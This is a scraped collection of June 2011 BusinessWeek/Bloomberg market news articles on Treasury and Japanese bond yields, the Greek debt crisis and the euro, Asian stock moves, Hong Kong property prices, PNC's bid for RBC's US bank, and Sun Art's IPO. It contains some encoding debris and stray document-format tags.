2007, Fed and government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pared lending amid more than $2 trillion in losses and writedowns, according to data compiled by Bloomberg. Instead of making loans, financial institutions have put more cash into Treasuries and government-related debt, boosting holdings to $1.68 trillion from $1.08 trillion in early 2008, Fed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10-year Treasuries - the benchmark for everything from corporate bonds to mortgage rates - have fallen to less than 3 percent from the average of 6.79 percent over the past 30 years even though the amount of marketable U.S. government debt outstanding has risen to $9.26 trillion from $4.34 trillion in 2007, Treasury Department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Ten-year yields fell 2.5 basis points, or 0.025 percentage point, last week to 2.94 percent in New York, the fifth straight weekly decline, according to Bloomberg Bond Trader prices. The price of the 3.125 percent security due in May 2021 rose 7/32, or $2.19 per $1,000 face amount, to 101 17/32.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Lending Drop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dropped and savings rose in Japan, too. Lending has declined 27 percent from the peak in March 1996, while bank holdings of government debt surged more than fivefold to a record 158.8 trillion yen ($1.98 trillion) in April, according to the Bank of Japan. The difference in deposits and loans, known domestically as the yotai gap, is 165 trillion yen, or more than Spain's annual economic output.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Japanese bonds due in 10 years dropped to 1.115 percent last week from 3.46 percent in 1996 and have remained at about 2 percent or lower since 2000. U.S. and Japanese rates were little changed today as of 12:30 p.m. in Tokyo.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and Japan are "beginning to look similar because of the fact that we've had very low interest rates for a very long time now" Charles Comiskey, the head of Treasury trading at Bank of Nova Scotia in New York, said in an interview. "This is going to be 10 years of pain to de-lever ourselves from the mess of a debt-ridden society that we've become."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Rates Outlook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Futures traded on the Chicago Board of Exchange indicated in January that the Fed would raise its target rate for overnight loans between banks from a record low of zero to 0.25 percent in 2011. After reports this month showed that the jobless rate rose back above 9 percent, consumer confidence fell, the housing market weakened and manufacturing slowed, traders now see no increase until late 2012 at the earliest.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IMF said the U.S. economy will grow 2.5 percent this year and 2.7 percent in 2012, down from the 2.8 percent and 2.9 percent projected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Further declines in Treasury yields may be limited because the inflation rate is higher than in Japan, where consumer price changes have been mostly negative since 2000.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prices rose 3.6 percent in May from a year earlier, according to the Labor Department. That means 10-year Treasuries yield 62 basis points less than the inflation rate. So-called real yields in Japan, where consumer prices rose 0.3 percent in April, are a positive 82 basis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Pimco Avoids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bonds at the current valuation would likely disappoint long-term investors with low or even negative real returns," Tomoya Masanao, the head of portfolio management for Japan at Pacific Investment Management Co., wrote in an e-mail to Bloomberg News. "The global economy seems more tilted to inflation than deflation over the next three to five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Pimco, based in Newport Beach, California, had $1.28 trillion under management as of March 31, including the world's biggest bond fund, the Total Return Fund. Bill Gross, the firm's co-chief investment officer, has said mortgages, corporate bonds and sovereign debt of nations such as Canada are more attractive.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median estimate of more than 50 economists and strategists surveyed by Bloomberg is for 10-year Treasury yields to rise to 4 percent over the next 12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Weak Housing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forecasts fail to take into account the weak U.S. housing market, which makes up the bulk of Americans' net worth, according to Akio Kato, the team leader for Japanese debt in Tokyo at Kokusai Asset Management Co., which runs the $31.1 billion Global Sovereign Open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home prices won't rebound unless household debt" is reduced, Kato said. "As long as the situation remains the same, bank lending won't grow. U.S. banks will tighten criteria for borrowers."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prices in 20 U.S. cities are 14 percent below the average of the past decade, according to the S&amp;P/Case-Shiller index of property values. The gauge dropped in March to the lowest level since 2003. Japan's land prices are still at less than half the level of two decades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 has endured two decades of economic stagnation with nominal gross domestic product about the same as it was in 1991. Government debt is projected to reach 219 percent of GDP next year, the Organization for Economic Cooperation and Development estimates. That compares with about 59 percent in the U.S., government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BOJ Nullified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has struggled to recover even though the BOJ buys government securities monthly to lower borrowing costs and stimulate the economy. The efforts have been nullified as banks use BOJ funds to buy bonds rather than lend.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no prospects for Japan's economic growth, funds from the widening loan-deposit gap flow to bonds rather than stocks," said Katsutoshi Inadome, a strategist in Tokyo at Mitsubishi UFJ Morgan Stanley Securities Co., a unit of the nation's largest listed-bank.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similar to the U.S., where economists are cutting growth forecasts even though the Fed has pumped almost $600 billion into the financial system since November by purchasing Treasuries under a policy known as quantitative easing. The program is due to end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Mizuho's Takei said there is a "very high chance" that lenders will continue to funnel deposits to the bond market, helping to push Treasury 10- year yields toward 2.4 percent within a few months. Takei said he favors longer-maturity securities.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"Eventually, yields in Japan and the U.S. will converge," said Mizuho's Takei. "This is just the beginning."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Wes Goodman in Singapore. Editors: Philip Revzin, Jonathan Annells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Masaki Kondo in Singapore at mkondo3@bloomberg.net; Yoshiaki Nohara in Tokyo at ynohara1@bloomberg.net; Saburo Funabiki in Tokyo at sfunabiki@bloomberg.net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Rocky Swift at rswift5@bloomberg.net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First Time Home Buying Online Banking Banking Industry Royal Bank of Scotland (RBS) Buying a Foreclosed Home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http://www.businessweek.com/news/2011-06-20/banks-have-record-1-45-trillion-to-buy-bonds-on-savings.html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Weakens as Greece Election Proposals May Worsen Debt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12:00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Greek Default Spells Б─≤HavocБ─(tm) for Banks a Year After Bailout Europe May Withhold Half of Greek Payment to Pressure Athens Euro Strengthens as Germany Signals Compromise on Greek Crisis Euro Strengthens After Merkel Agrees to Greek Debt Compromise Euro Falls on Concern Europe Leaders Failing to Resolve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Kristine Aquino and Candice Zachariahs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euro fell against the dollar for the first time in three days as calls for new elections in Greece dimmed prospects for austerity measures needed to ensure an aid package to prevent the currency union's first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17-nation euro declined for a fourth day versus the yen, its longest losing streak in six weeks, before the Greek parliament resumes debating a motion of confidence in Prime Minister George Papandreou's government. The greenback strengthened against 14 of 16 major peers as investors bought safer assets. Japan's currency weakened against the dollar after a report showed its exports fell more than forecast.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inclination would be to sell into euro rallies," said Sean Callow, a senior currency strategist at Westpac Banking Corp. in Sydney. "We're not at all convinced that Greece has the political will to deliver everything that its lenders want from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fell to $1.4260 as of 12:40 p.m. in Tokyo from $1.4306 in New York on June 17. The shared currency declined to 114.35 yen from 114.52, extending last week's 0.6 percent drop. The dollar rose to 80.19 yen from 80.05.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kicked off a three-day debate yesterday on a confidence motion in his government. He called for the vote last week, after opposition parties rejected pleas for national consensus and the prime minister's handling of the crisis led to defections from his party. Antonis Samaras, leader of New Democracy, the largest opposition party in Greece, repeated his call for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needs parliamentary approval of a 78 billion-euro ($111 billion) package of budget cuts to ensure the payment of a fifth loan under last year's 110 billion-euro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‘Precarious' Greek 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should sell the euro on gains above $1.43 on concern the Greek government is "a little too precarious," Westpac's Callow said. The median forecast of 49 analysts polled by Bloomberg News is for the euro to fall to $1.40 by December.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today pushed Greece to pass laws to cut the deficit and sell state assets, and left open whether the country will get the full 12 billion euros promised for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forcefully reminded the Greek government that by the end of this month they have to see to it that we are all convinced that all the commitments they made are fulfilled," Luxembourg Prime Minister Jean-Claude Juncker told reporters after chairing the seven-hour meeting.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‘Really Voluntary'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Declines in the euro were limited after Juncker, who leads the region's group of finance ministers, said any role for private investors in a new rescue package for Greece "has to be really voluntary."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climbed on June 17 after German Chancellor Angela Merkel retreated from demands that bondholders be forced to shoulder a "substantial" share of a Greek rescue, saying she'll work with the European Central Bank to avoid disrupting markets. Merkel's comments came in joint press conference with French President Nicolas Sarkozy.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Germany and France have reached an agreement and seem to be broadly singing the same tune as the ECB, I certainly think we will get that second package and at the very least it will postpone the problem," said Adam Carr, a senior economist in Sydney at ICAP Australia Ltd., a unit of the world's largest interdealer broker. "Medium-term prospects for the euro are good."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Reserve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strengthened on speculation the Federal Reserve won't signal another round of quantitative easing in a meeting on June 22, increasing appetite for safer assets.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odds that the Fed will increase interest rates by March 2012 fell to 22 percent on June 17 from 32 percent a month ago. The central bank has kept its benchmark rate unchanged between zero and 0.25 percent since December 2008. It will conclude its $600 billion dollar bond-buying program, so- called quantitative easing, by the end of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economists expect the FOMC to make the formal decision to conclude QE2 at the end of June," Barclays Plc strategists including London-based Sara Yates said today in a research note to clients.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 Chairman Ben S. Bernanke will likely reiterate that the balance of risk doesn't favor further asset purchases, according to the strategists.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current environment, we expect these comments to be mildly U.S. dollar positive," the Barclays economists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 Yen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has appreciated 1.2 percent in the past week, according to Bloomberg Correlation-Weighted Currency Indexes. The Dollar Index, which tracks the greenback against counterparts from six major trading partners, climbed for two straight weeks until June 17, before advancing 0.3 percent to 75.200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yen snapped two days of gains versus the dollar after the Finance Ministry said Japan's exports fell 10.3 percent in May from a year earlier, adding to signs the economy may struggle to recover from the March 11 earthquake and tsunami. The median estimate of economists surveyed by Bloomberg News was for an 8.4 percent drop.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little bit of yen weakness following those export numbers," said Sue Trinh, a senior currency strategist at Royal Bank of Canada in Hong Kong.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James G. Neuger and Stephanie Bodoni in Luxembourg. Editors: Garfield Reynolds, Naoto Hosoda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Kristine Aquino in Singapore at kaquino1@bloomberg.net Candice Zachariahs in Sydney at czachariahs2@bloomberg.net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Rocky Swift at rswift5@bloomberg.net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Sovereign Debt European Financial Crisis Small Business Debt Greece's Economy Debt Settlement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http://www.businessweek.com/news/2011-06-20/euro-weakens-as-greece-election-proposals-may-worsen-debt-crisis.html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Asian Stocks Erase Gain as Oil Slides; Japanese Utilities Rally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12:58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Oil Drop on Greek Debt Concerns; Asian Stocks Pare Gains Asiana, Hon Hai, PetroChina, RHB: Asia Ex-Japan Stock Preview Japanese, Australian Stock Futures Rise on Greece, U.S. Economy Asian Stocks Post Longest Series of Weekly Losses Since 2004 Asian Stocks Cap Biggest Weekly Losing Streak in Seven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Shani Raja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Asian stocks erased gains after oil prices fell to a five-month low as European governments failed to agree a loan payout to spare Greece from default. Japanese nuclear-power generators advanced.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BHP Billiton Ltd., Australia's biggest oil producer slid 0.6 percent in Sydney. Sun Hung Kai Properties Ltd., the world's biggest developer by market value, lost 1.6 percent in Hong Kong after Walter Kwok, a former chairman, said the city's property prices may fall as much as 15 percent by the end of the year. Japanese power companies advanced after the government said it may allow atomic reactors to restart following the worst nuclear accident in 25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Asia Pacific Index fell 0.2 percent to 129.4 as of 1:37 p.m. in Tokyo, with about the same number of stocks advancing as declining. The gauge earlier climbed as much as 0.7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 may well construct a solution to Greece's debt woes, but the acid test will be whether or not the markets will be convinced that the solution is enduring rather than a Band- Aid," said Tim Schroeders, who helps manage about $1 billion in global equities at Pengana Capital Ltd. in Melbourne.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Asia-Pacific index lost 1.9 percent last week, completing its seventh straight decline, the longest such run since 2004. Stocks in the Asian benchmark were valued at 13.2 times estimated earnings on June 16, the lowest since April 20, according to data compiled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rose 0.3 percent. Mazda Motor Corp., which makes more than 60 percent of sales outside Japan, climbed 3.1 percent after forecasting a return to profit and Citigroup Inc. raised its rating on Japan's auto sector to "neutral" from "bearish."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Kospi Index slipped 0.2 percent after rising as much as 0.8 percent. Australia's S&amp;P/ASX 200 Index dropped 0.1 percent. China's Shanghai Composite Index slumped 0.9 percent after Credit Suisse Group AG said the nation's economy is heading for a "sluggish landing."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Hang Seng Index lost 0.1 percent, extending its decline since an April 8 high to more than 11 percent, beyond the threshold of 10 percent that some analysts view as marking a so-called correction.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Akiko Ikeda in Tokyo. Editors: Nick Gentle.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Shani Raja in Sydney at sraja4@bloomberg.net; Toshiro Hasegawa in Tokyo at thasegawa6@bloomberg.net.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Gentle at ngentle2@bloomberg.net.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Oil and Gas Recruitment Investing in Growth Stocks Oil Prices Asian Automakers Oil Speculation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http://www.businessweek.com/news/2011-06-20/asian-stocks-erase-gain-as-oil-slides-japanese-utilities-rally.html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Oil Drop on Greek Debt Concerns; Asian Stocks Pare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12:11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Asian Stocks Erase Gain as Oil Slides; Japanese Utilities Rally Japanese, Australian Stock Futures Rise on Greece, U.S. Economy Asian Stocks Post Longest Series of Weekly Losses Since 2004 Stocks Rise, Euro Strengthens on Greece Optimism; Oil Sinks Asian Stocks Cap Biggest Weekly Losing Streak in Seven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Shiyin Chen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euro slid, starting a third week of losses, while oil and copper fell after European governments failed to agree on a loan payment to avert Greek default. U.S. equity-index futures dropped, while Asian stocks pared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shared currency weakened 0.3 percent to $1.4260 and retreated for a fourth day against the yen as of 12:45 p.m. in Tokyo. Crude declined 1 percent in New York, copper sank 1 percent in London, while silver futures climbed for a third day. Standard &amp; Poor's 500 Index futures retreated 0.4 percent. The MSCI Asia Pacific Index was little changed after earlier increasing as much as 0.7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put off a decision on whether Greece will get the full 12 billion euros ($17.1 billion) promised for July as they pushed for budget cuts by Prime Minister George Papandreou, whose government faces a confidence motion this week. Stocks gained as companies from Mazda Motor Corp. to Olympus Corp. forecast improving profits amid a sell- off that has dragged valuations for the MSCI Asia Pacific Index down to the lowest level in almost three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Greece may have invented democracy, they certainly didn't invent stability so you could see further pressure on the euro," Nick Maroutsos, a money manager and co-founder at Kapstream Capital, said in a Bloomberg Television interview from Sydney. "They need to start implementing stronger austerity measures but it's increasingly difficult given the social unrest and the political volatility that they're facing."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Confidence Motion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slid against 13 of its 16 most-actively traded counterparts and declined 0.1 percent to 114.36 yen. Papandreou began a three-day debate yesterday on a confidence vote in his new government as he sought parliamentary approval for a 78 billion-euro ($111 billion) package of budget cuts. Antonis Samaras, leader of New Democracy, the largest opposition party in Greece, repeated his call for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will decide on a new financing strategy for Greece by early July, the group said in a statement distributed to reporters in Luxembourg after talks. The Australian dollar lost 0.4 percent to $1.0575 while New Zealand's currency slid 0.5 percent to 80.86 U.S. cents.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"They'll come up with a short-term financing deal, which will answer the immediate funding issues," Stephen Davies, chief executive officer of Javelin Wealth Management Ltd., said in a Bloomberg Television interview in Singapore. "But as far as resolving the really long-term issues, as in how on earth Greece and the Greek people afford the interest payments and principal repayments without cratering the economy, that's going to be left for a later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Silver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for July delivery slipped 1 percent to $92.05 a barrel on the New York Mercantile Exchange, retreating for a second day. Futures fell 2 percent on June 17, capping a 6.3 percent weekly slump that was the steepest since the period ended May 6. Copper for three-month delivery lost 1 percent to $9,008 a metric ton on the London Metal Exchange, while silver futures rallied 0.1 percent to $35.79 an ounce.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climbed 0.3 percent on June 17, leaving the index little changed for the week. Two-year Treasuries yielded 0.39 percent, five basis points away from the lowest level this year. Home sales probably dropped in May to the lowest level this year, while orders placed with factories gained, economists said before reports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three shares climbed for every two that fell on MSCI's Asia Pacific Index. The gauge completed seven consecutive weekly losses on June 17, the losing streak since 2004. Last week's declines drove the index's valuations to 14.2 times reported earnings, the lowest level since March 30.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Utilities, Mazda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climbed 0.3 percent, snapping a two-day drop. Utilities rose, paced by Chubu Electric Power Co., amid signs the government may allow atomic reactors to be restarted following the worst nuclear accident in 25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Mazda Motor jumped 3.1 percent after the automaker forecast it will return to profit in the year ending March 31. Olympus increased 3.3 percent after the optical-equipment maker forecast profit may more than double. Caltex Australia Ltd., the nation's biggest oil refiner, dropped 6.2 percent after it forecast a drop in first-half operating profit because of plant disruptions and higher crude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are starting to look good value," said Shane Oliver, head of investment strategy at AMP Capital Investors Ltd, said in an e-mailed note. "But given the list of worries, you can't rule out further falls. Europe and other issues mean there are still a lot of balls in the air, and still a lot of worries bubbling away in the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Shanghai Composite Index fell 0.9 percent, bound for the lowest close in almost nine months, after Credit Suisse Group AG said the country is heading for a "sluggish landing" as economic growth slows and bank risks rise. Bank of China Ltd. and Agricultural Bank of China Ltd. slipped after the brokerage cut its recommendation on the shares.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Twelve-month non-deliverable yuan forwards fell to 6.3824 in Shanghai, compared with 6.3745 yuan at the end of last week, according to data compiled by Bloomberg. The possibility of a large appreciation of the yuan is small, the official Xinhua News Agency reported yesterday, citing an unidentified person.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Rishaad Salamat and Susan Li in Hong Kong, Alexander Kwiatkowski, Wes Goodman, Kristine Aquino and Kim Kyoungwha in Singapore, and Candice Zachariahs and Shani Raja in Sydney. Editors: James Poole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Shiyin Chen in Singapore at schen37@bloomberg.net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Poole at jpoole4@bloomberg.net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Indian Stock Market Oil and Gas Stock Research Offshore Oil Drilling Exchange-Traded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http://www.businessweek.com/news/2011-06-20/euro-oil-drop-on-greek-debt-concerns-asian-stocks-pare-gains.html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Hong Kong Home Prices to Fall Up to 15%, Walter Kwok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12:34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Auchan-Backed Sun Art Said to Test Demand for $1 Billion IPO Buffett-Backed BYD to Raise $219 Million in China Share Sale China Existing Housing Market Cools in May Amid Measures China Wealth Fuels Hong Kong Home Price Surges, Tsang Says Prada IPO Said to Raise $2.14 Billion as Shares Sold at Low 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Frederik Balfour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Barclays's forecast in sixth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Hong Kong property prices may fall as much as 15 percent by the end of the year, said Walter Kwok, former chairman of Sun Hung Kai Properties Ltd., the world's biggest developer by market value.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Lukewarm demand at a land auction on June 9 for a parcel of land on Borrett Road will lead to a softening of prices of finished properties, said Kwok in an interview in the western Chinese city of Chongqing on June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wouldn't be surprised they will fall 10 to 15 percent," Kwok said. "We have already seen the peak."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officials including Chief Executive Donald Tsang have warned of an asset bubble in the Chinese city, where home prices have surged more than 70 percent since the beginning of 2009. In the most recent measures to curb prices, announced on June 10, the government raised up-front payments for properties costing more than HK$6 million ($770,000) and required borrowers whose income is primarily from outside Hong Kong to deposit an extra 10 percent when they buy properties unless they can demonstrate a "close connection" to the city.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will add more than 20,000 homes this year and may offer more land for residential projects, Tsang said in an interview in Melbourne on June 17.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may drop 10 percent to 20 percent in 2012 and a further 10 percent in 2013 on rising interest rates, Andrew Lawrence, a Hong Kong-based analyst at Barclays Capital, said in a June 7 Bloomberg Television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Property Shares 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Hang Seng Property Index, which includes Sun Hung Kai, has declined 12 percent this year, while the benchmark Hang Seng Index is down 5.9 percent. Sun Hung Kai is down 15 percent this year and dropped 1.6 percent to HK$109.30 at the midday break.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Rising prices should not be entirely blamed on mainland Chinese, and the measures making it more difficult for non- residents to purchase property will not solve the problem, Kwok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should not give the impression to the outside world that it practices discrimination; this is open door,"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from mainland China of property in Hong Kong are exacerbating the territory's shortage of land for development, Tsang said on June 17. Mainland China doesn't include Hong Kong, Macau or Taiwan.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‘Reasonable' Level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from other Chinese cities account for 20 percent to 30 percent of sales, a level Kwok called "reasonable," especially when compared with London and New York where foreign ownership is larger.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from overseas and other Chinese cities accounted for about a third of luxury home transactions in the first quarter of this year, according to Centaline Property Agency Ltd., the city's biggest privately held realtor. Savills Plc ranks Hong Kong as the most expensive place to buy an apartment.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Cheung Kong (Holdings) Ltd., controlled by billionaire Li Ka-shing paid about HK$26,763 per square foot, according to Centaline. That is considerably less than the HK$35,000 per square foot the market expected, said Kwok.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Kwok is the eldest son of Sun Hung Kai's late co-founder Kwok Tak Seng. He was stripped of the company's chairmanship in 2008 by brothers Thomas and Raymond Kwok, who replaced him with their mother. Walter remains a non- executive director of the company. The family's combined wealth of $20 billion is second on Forbes Magazine's list of Hong Kong richest.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Andreea Papuc, Linus Chua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Frederik Balfour in Hong Kong at fbalfour@bloomberg.net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The Hong Kong Stock Exchange Marketing to Moms Business- to-Business Marketing Marketing to Women Buying a Foreclosed Home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http://www.businessweek.com/news/2011-06-20/hong-kong-home-prices-to-fall-up-to-15-walter-kwok-says.html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PNC Said to Pay $3.45 Billion for RBC U.S. Retail Banking Unit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2011, 12:17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FalconeБ─(tm)s LightSquared, Sprint Agree to 15-Year Network Accord Capital One to Buy INGБ─(tm)s Online U.S. Bank for $9 Billion Reynolds Buys Graham for $1.68 Billion, Beating Out Silgan RBC Said to Near Sale of U.S. Bank Unit to PNC Financial BofAБ─(tm)s Moynihan Says Capital Rules May Discourage Lending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Jeffrey McCracken, Douglas Alexander and Laura Marcinek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PNC Financial Services Group Inc. has agreed to pay $3.45 billion in cash and stock for Royal Bank of Canada's U.S. retail banking unit, according to people with knowledge of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could include as much as $1 billion in PNC stock and may be announced as early as today, said the people, who declined to be identified because the talks are private. PNC also agreed to acquire credit-card assets from RBC for $165 million, the people said. The value of the agreements totals about $3.62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acquisition would help Pittsburgh-based PNC expand its retail business in the U.S. Southeast beyond a foothold in Florida. The RBC Bank unit, based in Raleigh, North Carolina, has more than 420 branches in six states across the region. PNC Chief Executive Officer Jim Rohr, 62, told investors June 3 the bank is "disciplined" with acquisitions, preferring purchases that build 10 percent market share in "larger" cities.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an appetite for acquisitions given their capitalization and the lack of organic loan growth," Tom Lewandowski, an analyst at Edward Jones &amp; Co. in St. Louis, said in a June 17 interview. "They're looking to go out there and purchase that loan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precise amount of PNC stock that RBC would receive will be determined closer to the date the deal is completed, which is expected by March, the people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City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PNC has retail operations in 15 states and Washington D.C., including more than 2,500 branches, according to the bank's website. The firm acquired National City Corp. in 2009 for about $3.9 billion in stock.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Royal Bank is seeking to sell RBC Bank a decade after it entered the U.S. with a $2.16 billion takeover of Centura Banks. Royal Bank is retreating from U.S. consumer lending as competitors Toronto-Dominion Bank and Bank of Montreal expand by acquiring troubled U.S. lenders.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RBC Bank has posted 11 consecutive quarterly losses as of March 31, with combined annual losses of about $3.1 billion since 2007, according to Federal Deposit Insurance Corp. filings. RBC Bank is the smallest of Royal Bank's U.S. operations, which also include wealth management and RBC Capital Markets investment bank.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Fred Solomon, a spokesman for PNC, said the bank doesn't comment on "rumors or speculation." Katherine Gay, a spokeswoman for RBC,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Royal Bank rose 64 cents, or 1.2 percent, to C$54.33 on June 17 in Toronto Stock Exchange trading. PNC fell $1.68, or 2.8 percent, to $57.79 that day in New York Stock Exchange composite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JPMorgan Chase &amp; Co. is advising RBC on the transaction, and Bank of America Corp. is advising PNC, the people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Peter Eichenbaum, David Scheer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Jeffrey McCracken in New York at jmccracken3@bloomberg.net; Doug Alexander in Toronto at dalexander3@bloomberg.net; Laura Marcinek in New York at lmarcinek3@bloomberg.net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David Scheer at dscheer@bloomberg.net; Jennifer Sondag at jsondag@bloomberg.net;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Retail Sales U. S. Broadband Policy U.S.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Competitiveness U.S. Stock Market U.S. Energy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08:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/pnc-said-to-pay-3-45-billion-for-rbc-u-s-retail-banking-unit.html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Auchan-Backed Sun Art Said to Test Demand for $1 Billion IPO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11:36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Buffett-Backed BYD to Raise $219 Million in China Share Sale China Existing Housing Market Cools in May Amid Measures Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says China Wealth Fuels Hong Kong Home Price Surges, Tsang Says Prada IPO Said to Raise $2.14 Billion as Shares Sold at Low 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Fox Hu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Sun Art Retail Group Ltd., the Chinese hypermarket operator backed by French retailer Group Auchan SA, began gauging investor demand today for an initial public offering that may raise about $1 billion, two people with knowledge of the matter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Shanghai-based company plans to set a final price for its shares on July 7 and start trading in Hong Kong on July 15, said the people, who declined to be identified because the information is private. Citigroup Inc., HSBC Holdings Plc and UBS AG are managing the offering, the people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retailer plans to use about half of the IPO proceeds to open new outlets in China and 30 percent to repay bank loans, the people said. Sun Art said in a filing to the Hong Kong stock exchange today that has the biggest market share among hypermarket operators in China, where it competes against Wal- Mart Stores Inc., Carrefour SA, Tesco Plc, and state- backed China Resources Enterprise Ltd.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has been anticipating Sun Art Retail's IPO and may offer higher premium to it on the rosy prospects of its own business and more importantly on China's consumer market," Chang Dongliang, a Shanghai-based analyst with Everbright Securities Co said by phone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 Auchan is among the company's "ultimate controlling shareholders", Sun Art said in the filing. The filing doesn't reveal how big Group Auchan's stake in Sun Art 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Ruentex Development Co. and Ruentex Industries Ltd., both listed in Taiwan, are also among Sun Art's shareholders, the filing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Sun Art's profit was 1 billion yuan ($154.5 million) last year on sales of 56.2 billion yuan, the filing shows. Unaudited first-quarter profit surged 32 percent to 522 million yuan while sales grew 27 percent to 19.8 billion yuan.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Meng Fan-wen, Ruentex Industries Ltd's spokesman, said all the information the company can disclose is in the stock exchange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Fox Hu in Hong Kong at fhu7@bloomberg.net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Philip Lagerkranser at lagerkranser@bloomberg.net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Initial Public Offering (IPO) Traveling for Business Art Market Marketing to Women IT for Oil and Gas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07:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/auchan-backed-sun-art-said-to-test-demand-for-1-billion-ipo.html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Asian Stocks Rally; Australian Banks, Japan Automakers Advance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10:55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Asiana, Hon Hai, PetroChina, RHB: Asia Ex-Japan Stock Preview Japanese, Australian Stock Futures Rise on Greece, U.S. Economy Asian Stocks Post Longest Series of Weekly Losses Since 2004 Asian Stocks Cap Biggest Weekly Losing Streak in Seven Years Asia Housing Boom Stalls as Tightening Puts Brake on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Shani Raja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Asian stocks rose, snapping a seven- week decline, after Citigroup Inc. raised its recommendation on Japanese carmakers and Australian banks gained on speculation they will avoid losses from Europe's credit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Mazda Motor Corp., which makes more than 60 percent of sales outside Japan, climbed 3.1 percent after forecasting a return to profit and Citigroup raised its rating on Japan's auto sector to "neutral" from "bearish." Commonwealth Bank of Australia, the nation's biggest lender, advanced 1 percent in Sydney. Li &amp; Fung Ltd., the world's biggest supplier of toys to retailers including Wal-Mart Stores Inc., rose 2.7 percent in Hong Kong as an index of leading U.S. indicators advanced more than forecast.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Asia Pacific Index added 0.5 percent to 130.26 as of 11:32 a.m. in Tokyo. The gauge lost 1.9 percent last week, completing its seventh straight weekly decline, the longest such run since 2004. Stocks in the Asian benchmark were valued at 13.2 times estimated earnings on June 16, the lowest since April 20, according to data compiled by Bloomberg. Almost $700 billion has been wiped off the market value of the gauge since its high for the year on May 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are starting to look good value," said Shane Oliver, head of investment strategy at AMP Capital Investors Ltd, said in an e-mailed note. "But given the list of worries, you can't rule out further falls. Europe and other issues mean there are still a lot of balls in the air, and still a lot of worries bubbling away in the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rose 0.6 percent today. South Korea's Kospi Index gained 0.3 percent. Australia's S&amp;P/ASX 200 Index climbed 0.2 percent. All but one of the 10 industry groups on the Asia-Pacific index rose.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governments failed to agree on releasing a loan payout to spare Greece from default, ramping up pressure on Prime Minister George Papandreou to first deliver budget cuts in the face of domestic opposition.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forcefully reminded the Greek government that by the end of this month they have to see to it that we are all convinced that all the commitments they made are fulfilled," Luxembourg Prime Minister Jean-Claude Juncker told reporters early today after chairing a seven-hour euro crisis meeting in Luxembourg.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Akiko Ikeda in Tokyo. Editors: Nick Gentle.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Shani Raja in Sydney at sraja4@bloomberg.net; Toshiro Hasegawa in Tokyo at thasegawa6@bloomberg.net.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Gentle at ngentle2@bloomberg.net.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Asian Automakers Japan Real Estate Australian Securities Exchange Japan's Economy Stock Research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07:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/asian-stocks-rally-australian-banks-japan-automakers-advance.html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Greek Default Spells ‘Havoc' for Banks a Year After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11:49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 Fails to Agree on Greek Payment, Pressing Papandreou Europe May Withhold Half of Greek Payment to Pressure Athens EU Officials to Discuss Greek Plan That Skirts Default Risk Dombret Sees 2% to 3% Capital Buffer for 30 Largest Banks Hunt for Б─≤Holy GrailБ─(tm) Pits ECB Against Naked Banks: Euro Credit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Aaron Kirchfeld and Elena Logutenkova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Juncker comment in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 year after European officials bailed out Greece, investors say the region's banks haven't raised sufficient capital or cut loans enough to withstand the contagion that may follow a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European lenders reduced their risk tied to Greece by 30 percent to $136.3 billion last year by not renewing loans, writing down the value of debt and shifting it off their books, they still have almost $2 trillion linked to Portugal, Ireland, Spain and Italy, figures from the Bank for International Settlements show, leaving them vulnerable if the crisis spreads.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debt situation certainly has the potential to create havoc with the European banking system," said Neil Phillips, a fund manager at BlueBay Asset Management Plc in London, which oversees about $45 billion. "A Greek default and the ramifications of that would be too ghastly for Europe and the European banking system to contemplate right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Chancellor Angela Merkel retreated last week from a confrontation with the European Central Bank that threatened to shove Greece into the euro zone's first sovereign default, softening demands that bondholders be forced to shoulder a big part of a rescue. Questions remain about how any such burden- sharing agreement would work without prompting ratings companies to declare a default and whether Greek Prime Minister George Papandreou can persuade legislators to pass the austerity measures needed for a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Forceful Reminder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forcefully reminded the Greek government that by the end of this month they have to see to it that we are all convinced that all the commitments they made are fulfilled," Luxembourg Prime Minister Jean-Claude Juncker told reporters early today after chairing a euro-crisis meeting in Luxembourg.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governments failed to agree on releasing a loan payout to spare Greece from default, ramping up pressure on Papandreou to first deliver budget cuts in the face of domestic opposition and leaving open whether the country will get the full 12 billion euros ($17.1 billion) promised for July.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Decisions on the next payout and a three-year follow-up package were put off until early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Greek sovereign default could lead to insolvency of the country's banks and a liquidity crisis as a result of a run on deposits, Standard &amp; Poor's said in a June 15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Insolvency Fears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 that Greece was lurching toward insolvency drove the 48-company Bloomberg Europe Banks and Financial Services Index to a one-year low on June 16 and lifted the cost of insuring against default on the sovereign debt of Greece, Ireland and Portugal to record levels.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of insuring Greek debt saw the biggest weekly increase last week, while credit-default swaps on National Bank of Greece SA, the country's biggest bank, rose to a record, according to CMA, a data provider owned by CME Group Inc. that compiles prices quoted by dealers in the privately negotiated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contagion following a Greek default could play out like this: Refinancing costs for Ireland, Portugal, Spain and possibly Italy and Belgium would soar, thwarting efforts to rein in public deficits and putting states under pressure to restructure their debt as well; banks in countries with weak finances could face a run by depositors, while other lenders would see their capital eroded by credit writedowns; investors would shun equity markets and the euro and seek the safest securities. In a worst-case scenario, panic could freeze credit markets, as happened after the bankruptcy of New York-based Lehman Brothers Holdings Inc. in September 2008.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‘Massacre'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after a year of discussion without conclusion, we conclude there will be a haircut, the next morning the market will massacre Ireland, Portugal and maybe other countries," Federico Ghizzoni, 55, chief executive officer of UniCredit SpA, told journalists in Vienna June 16, referring to a Greek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is already having an impact on European banks. BNP Paribas SA, France's biggest bank, and rivals Societe Generale SA and 